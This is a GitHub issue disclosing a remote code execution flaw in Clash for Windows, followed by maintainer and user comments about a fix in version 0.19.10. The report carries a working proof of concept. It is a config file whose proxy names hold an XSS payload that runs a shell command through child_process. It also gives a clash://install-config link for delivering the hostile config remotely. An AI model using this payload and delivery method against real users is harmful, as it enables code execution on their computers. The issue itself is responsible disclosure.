Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

[Bug]: Remote Code Execution/远程代码执行 #2710

Closed
Anthem-whisper opened this issue Feb 23, 2022 · 30 comments
Closed

[Bug]: Remote Code Execution/远程代码执行 #2710

Anthem-whisper opened this issue Feb 23, 2022 · 30 comments
Labels

Comments

@Anthem-whisper
Copy link

@Anthem-whisper Anthem-whisper commented Feb 23, 2022

Clash For Windows Remote Code Execution

Description

Clash For Windows is powered by Electron. If a XSS payload is in the name of proxies, we can remotely execute any JavaScript code on the victim's computer.

image-20220223145225445

Affected versions of clash_for_windows_pkg

version: 0.19.8 (there are other vulnerability triggers in version 0.19.9, it's exactly 0.19.9)

Platform: Windows

OS specifics: Windows 10

PoC

  1. Import the following clash config file:
port: 7890
socks-port: 7891
allow-lan: true
mode: Rule
log-level: info
external-controller: :9090
proxies:
  - name: a<img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>
    type: socks5
    server: 127.0.0.1
    port: "17938"
    skip-cert-verify: true
  - name: abc
    type: socks5
    server: 127.0.0.1
    port: "8088"
    skip-cert-verify: true

proxy-groups:
  -
    name: <img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>
    type: select
    proxies:
    - a<img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>

  1. Switch to it in "Profiles"

  2. Click "Proxies" column (Sometimes it's not necessary.)

    image-20220223152427836

    Attention:

    • You need to make sure that the payload is displayed in the Proxies column.
    • Exploit is theoretically stable, but sometimes you may need to restart the clash_for_windows_pkg and reproduce the vulnerability

A way to Exploit

put the evil config file to internets and use clash:// to install it, clash_for_windows_pkg will download and switch to it automaticlly .

such as:

clash://install-config?url=http%3A%2F%2F1.1.1.1%3A8888%2F1.txt&name=RCE
@Anthem-whisper
Copy link
Author

@Anthem-whisper Anthem-whisper commented Feb 23, 2022

我已经向作者的iCloud邮箱发送了一封带了PoC的邮件
I have sent an email with the PoC to the author's iCloud mailbox

@Fndroid
Copy link
Owner

@Fndroid Fndroid commented Feb 24, 2022

非常感谢,下个版本修复

@Fndroid
Copy link
Owner

@Fndroid Fndroid commented Feb 25, 2022

fixed or implement in latest release, check it out from https://github.com/Fndroid/clash_for_windows_pkg/releases

@Anthem-whisper
Copy link
Author

@Anthem-whisper Anthem-whisper commented Feb 25, 2022

okay, I'll make it public now

@DragonQuestHero
Copy link

@DragonQuestHero DragonQuestHero commented Feb 25, 2022

@Anthem-whisper 低于0.19.8是否受到影响?

@Pain4ever
Copy link

@Pain4ever Pain4ever commented Feb 25, 2022

Electron框架写代码不开沙盒的屑 (doge

@yi-Xu-0100
Copy link
Contributor

@yi-Xu-0100 yi-Xu-0100 commented Feb 25, 2022

应该只有 0.19.8 受影响,这个版本才引入的。
重新验证了下,0.19.5 是可以复现调用计算器的。

@peanut996
Copy link

@peanut996 peanut996 commented Feb 25, 2022

围观 👀

@DragonQuestHero
Copy link

@DragonQuestHero DragonQuestHero commented Feb 25, 2022

锤子 低版本都受影响 机场直接变鸡场 乱杀 我查毒去了...

@54208039
Copy link

@54208039 54208039 commented Feb 25, 2022

吃瓜群众

@kjcxmx
Copy link

@kjcxmx kjcxmx commented Feb 25, 2022

right

@Fndroid
Copy link
Owner

@Fndroid Fndroid commented Feb 25, 2022

Electron框架写代码不开沙盒的屑 (doge

这xss和开不开沙盒有关么你看来,不开沙盒就是垃圾是吗?

@Anthem-whisper
Copy link
Author

@Anthem-whisper Anthem-whisper commented Feb 25, 2022

我给维护者 @Fndroid 的iCloud邮箱发了邮件,我希望能在GitHub仓库发布安全通告

@kotori2
Copy link

@kotori2 kotori2 commented Feb 25, 2022

Electron框架写代码不开沙盒的屑 (doge

这xss和开不开沙盒有关么你看来,不开沙盒就是垃圾是吗?

https://www.electronjs.org/zh/docs/latest/tutorial/sandbox

……因此,我们建议在大多数非常谨慎的情况下启用渲染器沙盒化。

@LztCode
Copy link

@LztCode LztCode commented Feb 25, 2022

测试了0.14和0.18都受到影响,有没有强制更新措施啊

@MrChenA
Copy link

@MrChenA MrChenA commented Feb 25, 2022

3. Click "Proxies" column (Sometimes it's not necessary.)

0.18.8也可以复现

@wjl110
Copy link

@wjl110 wjl110 commented Feb 25, 2022

谢谢楼主

@751897386
Copy link

@751897386 751897386 commented Feb 25, 2022

0.19.2也可以(

@GrayXu
Copy link

@GrayXu GrayXu commented Feb 25, 2022

希望可以发布一个影响范围(版本号范围?)的说明

@Anthem-whisper
Copy link
Author

@Anthem-whisper Anthem-whisper commented Feb 25, 2022

希望可以发布一个影响范围(版本号范围?)的说明

poc里面不是说了吗,小于等于0.19.8都受影响
其他平台因为没有设备就没有测试

@ccint3cc
Copy link

@ccint3cc ccint3cc commented Feb 25, 2022

更新至0.19.10,测试不受影响

@ccint3cc
Copy link

@ccint3cc ccint3cc commented Feb 25, 2022

0.19.8,poc测试成功。
1fa7480456b7a913f682d8001ba497c

@GrayXu
Copy link

@GrayXu GrayXu commented Feb 25, 2022

希望可以发布一个影响范围(版本号范围?)的说明

poc里面不是说了吗,小于等于0.19.8都受影响 其他平台因为没有设备就没有测试

感谢

@Anthem-whisper
Copy link
Author

@Anthem-whisper Anthem-whisper commented Feb 25, 2022

希望可以发布一个影响范围(版本号范围?)的说明

poc里面不是说了吗,小于等于0.19.8都受影响 其他平台因为没有设备就没有测试

感谢

更正一下,0.19.9版本并没有完全修复,请更新到0.19.10

@crazyMarky
Copy link

@crazyMarky crazyMarky commented Feb 26, 2022

感谢,已升级最新版

@yu-steven
Copy link

@yu-steven yu-steven commented Feb 26, 2022

在现场,贴贴

@ahackingboy
Copy link

@ahackingboy ahackingboy commented Mar 3, 2022

还好我情报工作OK

@malviez
Copy link

@malviez malviez commented Mar 3, 2022

感谢,已升级最新版,贴贴

@ajfg93
Copy link

@ajfg93 ajfg93 commented Mar 7, 2022

还在使用 0.11.3 版本 :)

@KonDream
Copy link

@KonDream KonDream commented Mar 7, 2022

0.19.11

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
Projects
None yet
Development

No branches or pull requests